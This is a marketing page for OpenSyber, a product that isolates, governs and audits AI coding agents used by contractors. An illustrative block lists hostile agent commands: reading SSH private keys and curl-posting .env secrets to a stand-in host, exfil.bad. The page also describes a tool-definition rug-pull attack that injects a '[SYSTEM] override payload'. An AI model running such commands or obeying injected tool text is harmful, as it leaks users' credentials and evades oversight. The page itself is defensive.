Skip to content
Trivy attack: Mar 19, 2026

Isolate.
Govern.
Audit.

Browser-isolated AI workspaces for contractors and distributed teams using Claude, Cursor, GitHub, and MCP. Enforce policy on every tool call. Audit every action. No managed laptop required.

WorkspaceMCP PolicyAudit
Spin up a workspaceWatch the contractor demo

Free pilot. No managed laptop. No sales call required.

Browser-isolated
MCP-policy enforced
Device-bound identity
Audited on every action
opensyber.cloud/dashboard
87

SCORE

Security Score

3/5

Agents

12

Threats

99.9%

Uptime

Live Event Feed

CRITICALCredential access blocked — agent quarantined
BLOCKEDSupply chain attack blocked — malicious postinstall
INFOSkill audit passed — v1.2.0
OKAgent heartbeat restored
WARNUnusual egress pattern detected — 3 new domains

Built on enterprise-grade infrastructure

Zero-Trust Architecture
Cloudflare Edge
SOC 2 Type II
GDPR compliant

I gave an AI sudo access and went to a standup. The standup was 45 minutes.

Let me ask you something

YOUR CONTRACTOR IS USING CLAUDE RIGHT NOW

On your repo. With your secrets. Through a laptop you don't manage. Existing security assumes a managed device. AI-assisted contractors don't have one.

Without OpenSyber

$ agent exec --tool=shell "cat ~/.ssh/id_rsa"
$ curl -s https://exfil.bad/collect -d @.env
$ npm install totally-legit-pkg@latest

Contractor + Claude + your repo + no visibility.

With OpenSyber

DENIEDUnscoped GitHub token blocked — workspace held
ALERTMCP exfil pattern detected — session paused
AUDITEDProduction Terraform apply blocked by policy

Isolated workspace. MCP gateway. Policy on every tool call. Audit on every action.

Runtime governance

EVERY ACTION HAS A CHAIN

When a contractor asks Claude to apply Terraform in production, six things happen in order. The gateway sees them all. The audit log keeps them linked.

  1. Contractor
    device-bound session
  2. Claude
    prompt + tool plan
  3. MCP gateway
    policy check
  4. Repo
    scoped PAT
  5. Terraform apply
    prod target
  6. DENIED
    policy: no prod apply

Same chain renders in the audit log. Same chain renders in the compliance export.

What you get

ONE WORKSPACE, FULL GOVERNANCE

ISOLATED BROWSER WORKSPACE

Contractor opens a hardened browser session. Claude, Cursor, MCP servers and shell are pre-baked. No managed laptop. No VPN. Device-bound session keys via TokenForge.

  • Browser isolation (Kasm)
  • Device-bound contractor identity
  • AI tools and MCP pre-installed

MCP POLICY CHOKEPOINT

Every MCP tool call routes through the OpenSyber gateway. Allow, deny, redact, or step-up auth. Block prod Terraform, force PII redaction, scope GitHub to a single repo and branch.

  • Per-workspace MCP allowlists
  • GitHub policy bridge (scoped PATs)
  • Step-up auth on high-risk tool calls
Explore

EXPLAINABLE AUDIT

Every prompt, MCP call, shell command, and GitHub action is linked into one trail. Reviewers see exactly what Claude did, what file it touched, what cluster it hit, and which policy approved it.

  • Prompt-to-action linking
  • Runtime telemetry (Falco / osquery)
  • SOC 2 / ISO 27001 / HIPAA evidence export
Explore

AI CONTRACTOR RUNTIME GOVERNANCE

A contractor opens Claude in an isolated workspace and asks for a prod Terraform deploy. Watch the gateway deny, the chain explain why, and the audit row land.

Open the contractor demo

The flow

INVITE. ISOLATE. AUDIT.

Three steps. No managed laptop. No VPN. Audit on every AI-assisted action.

STEP 01

INVITE A CONTRACTOR

Email invite plus device-bound enrollment. They open a browser-isolated workspace with Claude, Cursor, and your curated MCP servers pre-installed.

STEP 02

ENFORCE POLICY

Every MCP tool call routes through the OpenSyber gateway. Allow, deny, redact, or step-up. Block prod Terraform. Scope GitHub to a single repo and branch.

STEP 03

AUDIT EVERY ACTION

Prompts, MCP calls, shell commands, and GitHub actions are linked into one chain. Reviewers see exactly what Claude did and which policy approved it.

~/your-project — zsh
$opensyber invite contractor@example.com
See the contractor demo
Real attacks. Real orgs. Real bad.

THIS ALREADY HAPPENED

These aren't hypotheticals. These attacks hit real organizations in 2025-2026. Most found out from the news. The ones with monitoring found out in milliseconds.

MCP Drift Detection

REMEMBERS WHAT THEY LOOKED LIKE LAST TUESDAY

Snyk, Cisco mcp-scanner, Pipelock, Straiker — they all hash MCP tool definitions once per session. A rug-pull tuned to swap definitions on the third call defeats every one of them. OpenSyber records a SHA-256 fingerprint per tool, per server, across days and weeks. When it changes, you know.

Scan 1 — Monday

first observed

weather tool registered. fingerprint f798fc7b… stored.

Scan 2 — Wednesday

unchanged

weather tool re-hashed. fingerprint matches. trust intact.

Scan 3 — Sunday

drift detected

weather description gained [SYSTEM] override payload. fingerprint a519884c…. quarantine.

Scanners check your MCP servers once. OpenSyber remembers what they looked like last Tuesday.

Try the demo
Session Security

TOKENFORGE

A session cookie. In 2026. For something with access to your AWS keys. We fixed that. Every session is cryptographically bound to your device. Stolen tokens are worthless.

  • Non-extractable keypairs via Web Crypto API
  • Challenge-response signing on every request
  • Trust score engine with 7 weighted signals
  • Automatic step-up auth on anomaly detection
tokenforge — session audit

// Device bound via ECDSA P-256

device_id: d4e2f8a1c3b5...

trust_score: 94/100

signature: verified +40

ip_match: same_subnet +10

geo_match: EU (Frankfurt) +15

fingerprint: match +10

nonce: fresh (2ms) +5

action: allow

Two problems. Two products.

TWO PRODUCTS.
BECAUSE ONE WASN'T ENOUGH.

AI agents create two attack surfaces: what the agents do, and the sessions of the humans commanding them. We built a product for each. Because apparently nobody else was going to.

You are here

OPENSYBER

opensyber.cloud

Real-time monitoring, audited skills, and compliance for every AI agent. The thing that should exist by default but doesn't.

Protects: AI agent actions

From the moment your developer logs in to the last request their AI agent makes. Covered. Finally.

Who this is for

PICK YOUR ENTRY POINT

OpenSyber meets three audiences. Each one sees a different surface first.

I run engineering

Govern AI for your distributed team

Contractors and remote staff use Claude and Cursor against your repos. Get a workspace, a gateway, and an audit trail — without buying laptops.

Talk to engineering
I lead security

Audit every AI-assisted action

Prompt-to-action linking, MCP policy enforcement, and explainable denies. Map evidence to SOC 2, ISO 27001, HIPAA, and GDPR controls.

Talk to security
I'm a contractor

Get a secure workspace in minutes

Open a browser-isolated session with Claude, Cursor, and the MCP servers your client approved. No installs on your laptop. No VPN.

Join via invite

GOVERN THE AI YOUR CONTRACTORS ALREADY USE

Your contractors are running Claude and Cursor against your repos right now. Keep guessing what they did, or put a gateway and an audit trail between them and prod.

  • IsolateBrowser-isolated workspace. Code, secrets, and MCP servers never touch the contractor's laptop.
  • GovernEvery Claude and Cursor tool call hits the MCP policy chokepoint: allow, step-up, or deny per call.
  • AuditEvery AI action is linked to the repo or infra action it caused — one explainable, compliance-ready trail.
Start FreeDemo

No managed laptop. No VPN. No sales call.